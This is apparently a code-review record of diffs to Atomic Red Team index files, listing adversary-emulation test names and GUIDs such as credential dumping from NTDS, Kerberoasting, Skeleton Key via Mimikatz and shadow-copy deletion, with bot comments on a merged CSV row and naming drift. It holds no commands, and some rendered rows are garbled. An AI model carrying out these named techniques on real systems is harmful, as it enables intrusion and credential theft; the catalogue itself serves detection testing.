@@ -1345,8 +1329,6 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directo
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
discovery,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
@@ -1424,8 +1406,7 @@ discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
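Review bot: this hunk (-1424,8 +1406,7) removes test 3, System Network Connections Discovery via PowerShell (Process Mapping), GUID b52c8233-8f71-4bd7-9928-49fec8215cf5, and renumbers System Discovery using SharpView from 7 to 4 with GUID 96f974bb-a0da-4d87-a744-ff33e73367e9 unchanged. Renumbering on removal is harmless only if every consumer keys on GUID; if test numbers are meant to be stable identifiers, keep the gap instead, and either way the diff reads more clearly as a plain deletion than as a delete-and-reinsert of the same GUID.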
@@ -1516,7 +1497,6 @@ impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-49
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
@@ -1531,7 +1511,6 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
@@ -1544,7 +1523,6 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
394 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
395 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
396 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
defense-evasion T1027 Obfuscated Files or Information 11 Obfuscated PowerShell Command via Character Array 6683baf0-6e77-4f58-b114-814184ea8150 powershell
397 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
398 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
399 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
427 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
428 defense-evasion T1564.003 Hide Artifacts: Hidden Window 2 Headless Browser Accessing Mockbin 0ad9ab92-c48c-4f08-9b20-9633277c4646 command_prompt
429 defense-evasion T1564.003 Hide Artifacts: Hidden Window 3 Hidden Window-Conhost Execution 5510d22f-2595-4911-8456-4d630c978616 powershell
defense-evasion T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
430 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
431 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
432 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
649 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
650 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
651 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
652 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
653 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
654 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
808 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
809 persistence T1505.005 Server Software Component: Terminal Services DLL 2 Modify Terminal Services DLL Path 18136e38-0530-49b2-b309-eed173787471 powershell
810 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
811 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
812 persistence T1176 Browser Extensions 3 Edge Chromium Addon - VPN Firefox 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 cb790029-17e6-4c43-b96f-002ce5f10938 manual
813 persistence T1176 Browser Extensions 4 Google Chrome Load Unpacked Extension With Command Line Edge Chromium Addon - VPN 7a714703-9f6b-461c-b06d-e6aeac650f27 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 powershell manual
814 persistence T1137.005 T1176 Office Application Startup: Outlook Rules Browser Extensions 1 5 Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object Google Chrome Load Unpacked Extension With Command Line ffadc988-b682-4a68-bd7e-4803666be637 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 2 Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object bddfd8d4-7687-4971-b611-50a537ab3ab4 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 3 Outlook Rule - Auto-Forward Emails to External Address via COM Object b0bd3d76-a57c-4699-83f4-8cd798dd09bd powershell
persistence T1137.005 Office Application Startup: Outlook Rules 4 Outlook Rules - Enumerate Existing Rules via PowerShell COM Object 5ff5249a-5807-480e-ab52-c430497a8a25 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 5 Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) cb814cf8-24f2-41dc-a1cd-1c2073276d4a powershell
815 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
816 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
817 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
995 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
996 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
997 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
998 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
999 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
1000 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
1001 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
1002 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
1003 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
persistence T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1004 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
1005 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
1006 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
1034 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1035 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1036 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
command-and-control T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1037 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1038 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1039 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1089 collection T1113 Screen Capture 7 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1090 collection T1113 Screen Capture 8 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1091 collection T1113 Screen Capture 9 Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted 5a496325-0115-4274-8eb9-755b649ad0fb powershell
collection T1113 Screen Capture 10 RDP Bitmap Cache Extraction via bmc-tools 98f19852-7348-4f99-9e15-6ff4320464c7 powershell
1092 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1093 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
1094 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
1249 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1250 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1251 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
credential-access T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1252 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1253 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1254 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1258 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1259 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1260 credential-access T1003.003 OS Credential Dumping: NTDS 9 Create Volume Shadow Copy with diskshadow b385996c-0e7d-4e27-95a4-aca046b119a7 command_prompt
credential-access T1003.003 OS Credential Dumping: NTDS 10 Copy NTDS in low level NTFS acquisition via MFT parsing f57cb283-c131-4e2f-8a6c-363d575748b2 powershell
credential-access T1003.003 OS Credential Dumping: NTDS 11 Copy NTDS in low level NTFS acquisition via fsutil c7be89f7-5d06-4321-9f90-8676a77e0502 powershell
1261 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1262 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1263 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1329 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1330 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1331 discovery T1007 System Service Discovery 4 Get-Service Execution 51f17016-d8fa-4360-888a-df4bf92c4a04 command_prompt
discovery T1007 System Service Discovery 6 System Service Discovery - Windows Scheduled Tasks (schtasks) 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a command_prompt
discovery T1007 System Service Discovery 7 System Service Discovery - Services Registry Enumeration d70d82bd-bb00-4837-b146-b40d025551b2 powershell
1332 discovery T1040 Network Sniffing 4 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1333 discovery T1040 Network Sniffing 5 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1334 discovery T1040 Network Sniffing 6 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1406 discovery T1083 File and Directory Discovery 9 Recursive Enumerate Files And Directories By Powershell 95a21323-770d-434c-80cd-6f6fbf7af432 powershell
1407 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1408 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1409 discovery T1049 System Network Connections Discovery 3 4 System Network Connections Discovery via PowerShell (Process Mapping) System Discovery using SharpView b52c8233-8f71-4bd7-9928-49fec8215cf5 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
discovery T1049 System Network Connections Discovery 7 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1410 discovery T1654 Log Enumeration 1 Get-EventLog To Enumerate Windows Security Log a9030b20-dd4b-4405-875e-3462c6078fdc powershell
1411 discovery T1654 Log Enumeration 2 Enumerate Windows Security Log via WevtUtil fef0ace1-3550-4bf1-a075-9fea55a778dd command_prompt
1412 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1497 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1498 impact T1486 Data Encrypted for Impact 9 Data Encrypt Using DiskCryptor 44b68e11-9da2-4d45-a0d9-893dabd60f30 command_prompt
1499 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
impact T1496 Resource Hijacking 2 Windows - Simulate CPU Load with PowerShell 44315fb0-f78d-4cef-b10f-cf21c1fe2c75 powershell
1500 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1501 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1502 impact T1485 Data Destruction 5 ESXi - Delete VM Snapshots 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 command_prompt
1511 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1512 impact T1490 Inhibit System Recovery 10 Windows - vssadmin Resize Shadowstorage Volume da558b07-69ae-41b9-b9d4-4d98154a7049 powershell
1513 impact T1490 Inhibit System Recovery 11 Modify VSS Service Permissions a4420f93-5386-4290-b780-f4f66abc7070 command_prompt
impact T1490 Inhibit System Recovery 13 Windows - Delete Volume Shadow Copies via Diskshadow 42111a6f-7e7f-482c-9b1b-3cfd090b999c powershell
1514 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1515 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1516 impact T1529 System Shutdown/Reboot 12 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1523 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1524 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1525 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
initial-access T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1526 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1527 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1528 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
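Review bot: the T1049 row at 1409 runs two records onto one line: two test numbers (3 and 4), two test names (System Network Connections Discovery via PowerShell (Process Mapping) and System Discovery using SharpView) and two GUIDs (b52c8233-8f71-4bd7-9928-49fec8215cf5 and 96f974bb-a0da-4d87-a744-ff33e73367e9) followed by a single executor, while the very next row lists the SharpView GUID 96f974bb-a0da-4d87-a744-ff33e73367e9 again as test 7. Check that the generated CSV emits exactly one record per line and one row per GUID, and that each test number matches the position of that test in the T1049 YAML; a consumer parsing this CSV by column would silently mis-assign the SharpView test.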
@@ -134,7 +134,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -228,7 +228,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
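Review bot: the T1546.018 entry changes from "Event Triggered Execution: Python Startup Hooks" to plain "Python Startup Hooks", but its siblings in this same hunk, T1546.015 Event Triggered Execution: Component Object Model Hijacking and T1546.010 Event Triggered Execution: AppInit DLLs, keep the parent-technique prefix. Pick one source for the sub-technique display name and apply it to every entry so the list reads consistently; the same prefix drop recurs for T1556.001, T1137.005 and T1568.002 in the hunks below, so this is a generator-level choice rather than a one-off.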
@@ -302,7 +302,7 @@
- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -348,13 +348,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
